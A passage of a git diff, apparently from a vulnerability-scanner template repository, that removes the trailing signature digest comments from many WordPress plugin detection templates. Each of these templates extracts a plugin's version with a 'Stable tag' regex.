b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e9b90ebee6cf1e7c74e6cf3c0474db5a16e66140ec05733ee5fcd230d3c996c402204351f7b671bd96cd2556924cc5fe1f861d824dacbabaf9a53f160cf102b1e4ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 76c27889d6..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022065b2e9547ff46f8e67c49f9399f851576bbe146d8441cfed5356c2c56f974a24022100dddab096ca779ca90d9fc4b53d0acfb4ee0c1399a49defded4a93d6abb45031e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index cdb646ccab..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022008a1ed5098842e4115ed3693dd56bc02c43c7e5dafbcf576bf20772b571c4a0c022100d6c71a806957951907e79f5418d15801b0fe8190dca23cd0e504b240f91956df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 40950e194c..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200467f1be9bfd7510470e4aef97cd20519c309afa17798d8a30ecc805d902cd90022100971f8dadf6db3697c2a3aa2d8a6f8b0855c823117fb2bf60274d21bcd29d6724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 532171ca59..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207df06e4e23248673905d7e56191421a08031515e84b4f779531840e8d5cbc0c902207ad10b8f76227a524a4e9c1a443a7face658ae0cfa1b42e5a4b5b0f898c3afcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 4b99fd7ead..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d93eb1a3ac9803236f261cfe779bbaa1bc46eb8f835653a5792ee44e4f8e412f022100fd5ed8b17d56988aaf72ebb90e1194585017fc13937d1461518c128153bd541b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 14d3a3d0e5..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220665d517c43ce76cb35ae8902fac72898238abaf43b401b53809d7731822b33c0022100de408e4da79feb826a156950918ef0f420ff80d333acb345a0b5488d473ecfbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 0d84f1ca05..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201201951cf231f54f417cbb68acb52c871373c9b3120e9a5b2106c23105104a940220082842f8f6d93cac4a1f649ab77b6e4236de24f2684996c24ec03ec36123e0fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 4534943aca..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f7efced0d7ddadaf5f8df14390447fafb5fa36919148ec574889bc4451941a26022100c032cd486deea4520b870730e6727a9513d8ffd40c66b96078b55573b14aa5a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index bfd2003933..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022043acb35203a975c4ca61f2abac211b1a289170042d057591bc5512e07ff3d8c50221009ec6663c7ea09962f71e3f70f13f0297d6314652f70e3572b611a48806c4a655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 664930b802..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a104bc88522199c180e460592a2f926128e689342c3dcc179c092e4f7b9b945d022100aa3ebc4664aa32bd509fb9abbb96dcea78b55683f93976d571eee2a429e2ebb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index c0fd172543..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ab05262a4f1ef7e41705f9eeefba6a57f10b6b0a7014ea3517a69ef01f00dfed022037dafec63035d90c17db4c542d2f89f4295a9d7efc4640b20bf3f867a7b8cbf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index eef031d261..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009b8eff24b449ee024a48a2bf8b33eae86bef0429fbabe2ab9f6d63da76ada9b30220309f2f5abd4b89c21b43eb5b8ecb75da7a94e8986546419bd499a76c15f12f9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 03dc7e5696..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201ae49fc51916eae64f83b57460914a10fe43ddb24a52905735fc150644c335c9022100bea9fa22fd91fd8c757dafb8ce430b4599f2fdf6a5be994c1c47d58fd79cc420:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 9ae8be7594..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220018d407b47c8d33821aee327005a2e1843e7d33fc90929fa63b2459d2132bf980220599a9db8762ed8f6b7af8d67e600ef78b54a9b6cb90e126fd89dbe568fee55fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 7c69f99546..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100903884f0025d2a20e869acd66bdf1fe45addc4c3a1aea743b3d6ce2b369d5571022008a1b6f199d97e74202acbf66c387e9895d4f17498387336f78821ee4e67fb8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 2814a80450..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220771c3dd5412940c9c698e9f9c4e8df677bab8555710469486991b34b70528d0f02210099fabe68c2fa2c4394ab5ac04893879624cb47de6b376d4945641cbec7494b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 7064fbf3d7..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089d915bfbcdf3da1ba98c4560fd20f8e13c6d9241129fd6103870d30b286a4cd02204ccedbf48248d8ffbe1aca0b37b499dd5810b4a9250bc9004a11fa1bee721179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index f29ae2a9ba..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dfa0b4e45fe50ec849680e10df11906663e3b7d4064bf9c59f1902984217f812022075583fabc33eb0b4530873d1a6885e4e4c5ef52eb070cd77b9d0e8a28ef4d88f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 8d2614b99c..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022061e98f2297976cf1212f91fdd03141be0151f3e7b0788a9805e0fafdc59ab1e402204e1c028c869bff19efd94a18c2d6307fdd4cceed2f20e645349fdba6551623e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index e127756ea8..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f1919f8c8a667a9f3eb119d12830c6cb187f5970834fd8ff68ebe4b681e68cc5022100aca87e6d5e6512dbdaf71f6f16fdb9bc649fd7eabc6c347bcb3559e2fbfbc869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 561ec2e1d0..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae519fb974e4680a3f37590eb29fd6a01d58168f011f8f8219ed7230ada6292c022100c7f95171dd13a53365725968f3e22b31135039e333582a4241b49098bf9617c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 84fb0fa1e9..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d0d5aecda2d6f7b24b63453e5be0755fa467079315f1c5aaddcbd8a19622af6d022100cc938b3377dcefb5f0af311fa9d7c1bd9f05b25f527cf7a292f66e9150bc6a75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index d0dba2da1d..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e96966c22b6dab13f0bd6b584cd087ed3a01521f86bc2e5a469ca792a4f7a27d022100a88e8cbb205148524a64a71b9d556d28076def773faddc282c9e2a77748b8bf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d62357d629..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f77328c56c32f770bbe823b97386d3737bffaba9f8169ff95668c054fa8dfef5022019c8424c2627258b4e17cae96caba00ff1b64752b8d328b3c7c28943a1bb24e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index d6555e03c6..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220457e0a614bca7ffd5c651a04537bf4cbada945f804907c54fbbd9640070bbded022030304bac277a8bfd4f157f32072fe43c00d2d727781f1c6af7b5e4efd0a84e5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 1dea5def2b..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022047487239b68a4d25d5980c5b308003cfed8d1807437ef06d5c32f02e147bfef6022100dd8e676a117df5d8b6f5340f13bf5d0c4f52742896125be035e3ad1f9df37300:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index d09d6e43b1..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b24b848aa69bfbee04c97aef347134eda09d9c287f75fb588427603326843285022100b50522618552bf33de4299930cbe6c41b80759a51d551dde05cbabb8eb938df0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 4691cf09a6..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220287ca612a5a2403a27594d02cbfd187a7deb1a84566eef9640f9d5d351ba7485022100e7aee3491fdbdc081c04811790e30cf5bc3300a15d69dc7dcee02b55a66febfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 278aac9296..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b2c3c53f4bc4d199d986787d164f66d1ea17b9697915a112c0d13434b5e70f0022100b7e8fde40bfa99be3727c59d0010f8ab119ac9bb4016a42ec0e627acc116ad63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 17b5bbcc60..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022052ac4287e8079fbc31694ee7b24c8834d44b65d195038ce5204e892ab0b89572022100fa35ccd0e3b76cc79409c83296e64a1f82b4dea777138b4173428559c3377a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 7e0423c7b6..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022025d28245fece598bdfa0ba6598a722722a2583f012e5f3932d6a2749bd2f747202204e3d809a0f1c67a4b60a80e8a9d7b044fed546f92bfd91a497febf0ef180d1ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 400b7824c1..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203fa958edf0d4d70b7ff0cc3b6dd37426dbaf92c1f5641eab4940f10bb8171e8e022100eaca8886b65e0acd8832489105884ff8751103cf74f2d49aa4793c4ff13a7450:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index bae8cc3231..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df4934031d6390d801e349543b58c238a419bbb059c33c484ba8fd16154adf4f022100ad2f2fb60ad30aac4194b4b261a0705376ff3bf18bd5ef99a187ad60929e4edb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 9ea965e516..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220101cd707f9dd9945aa240f3bce825f9c1084761df950b566bb590d91dffa34e302206a0e9a3c62e849d6436dd12a3b7463574f8fa226d39bc01ac7ebe60335d23787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 5e3972a09d..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a025d2dc6786ebeb283d64b038a811c6253bf05cfb9a4304d691711d41b84b5022100ae05320d54d44802aa1e3550cd6a3bddcd0b6499983da98416cfb9f82c9a8a8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index e234495d82..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d5dbbf901cc20558893c29672f666f52093c2f2de84aa859c3f5eeb2c01edfa022021fe7946d5ccf4f2e8a6a5196639de903b74b128718e7e93db20178ae5538290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 2a094b8b9f..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f4d3f2230655dd7139091bd28d69469390f9259cdcefde377569a2c260a0ace02206597d9bb965f0d23822373f46c43d504cee3c27e21d8928b28f1195557eb5d32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 849e36839d..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b6e1978be30c8a264da990cb740aa3b2c249756b4f50a2b2a961ad6f0cc0eeeb022044ce3322894a1c56e6b8d5c2cf2a6ae3f78097afb4c794a8e1a22df273b24584:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 83d6986c0c..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202eff2d9ba2151ac6969607df5fc76719708768e122ac068492ff6cf332bfe846022100fca646ec79515eb0bad61d52ef567a22254ff9875b83d2ac011dd2e202bb9a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index bddb3693fc..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204b15322b3a80f61633d26cb60f18b30e20c12b7677c1e8661823e233633dff0a02207b3d4d6defec0f70994cff349f1bff928fcadcc9f12460844e8187529c0dfe14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index b621489a72..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220370139880f15b60c186c42f90d8fde3d71f1dbf1d8803dd4fdb65fda67a53198022100f2bbe9bc7885aec4355fef28efb58901cef973741215899cbce2e3da6db551fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index a92fbf4bc0..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b735646732b7b7f509f6b810739faf1fcc34668452f2652847dec592261f7be022100f106805e1e3a6ca0558bd08bc9ed07022fa5c8d23f60c7740136e2a138a02728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index c25d2e1dd3..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022055b8d6697ae7f770e32c480baf995a9ef4fbf5d9123f4d8affd26084827d8a610220780ecc087e1d1acfb8d65758305421b69a6e10fed6a3e0129fad4a73ca99a5c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index ca62340f18..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204d5e71e65d669079ce596aa6b268758f04b91d613e190636161d68b7a417953102201a9d5aeaa14436df8a0fbcb8a7043ac471d0c2015c0d1831c5ef5c9f5757ff97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 26d219c536..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aa636b948cd82168c2b37f4ec21c241b24d295870dcecb661847bbf33584edd402201530c66874af59ecbc4508ab1ce848dadc651e4212f20b6cf0faebb60b9fc3f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 9c49c1641a..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b875576d79b72ffe0a86c2e1999ea86ad6232dd6a3905520dae2ae14bf0d18702205ef228ac4b4009617a650b49a6cc37baecc49d7b331b66d469a858e6d4e0ab3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index afaa92e240..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 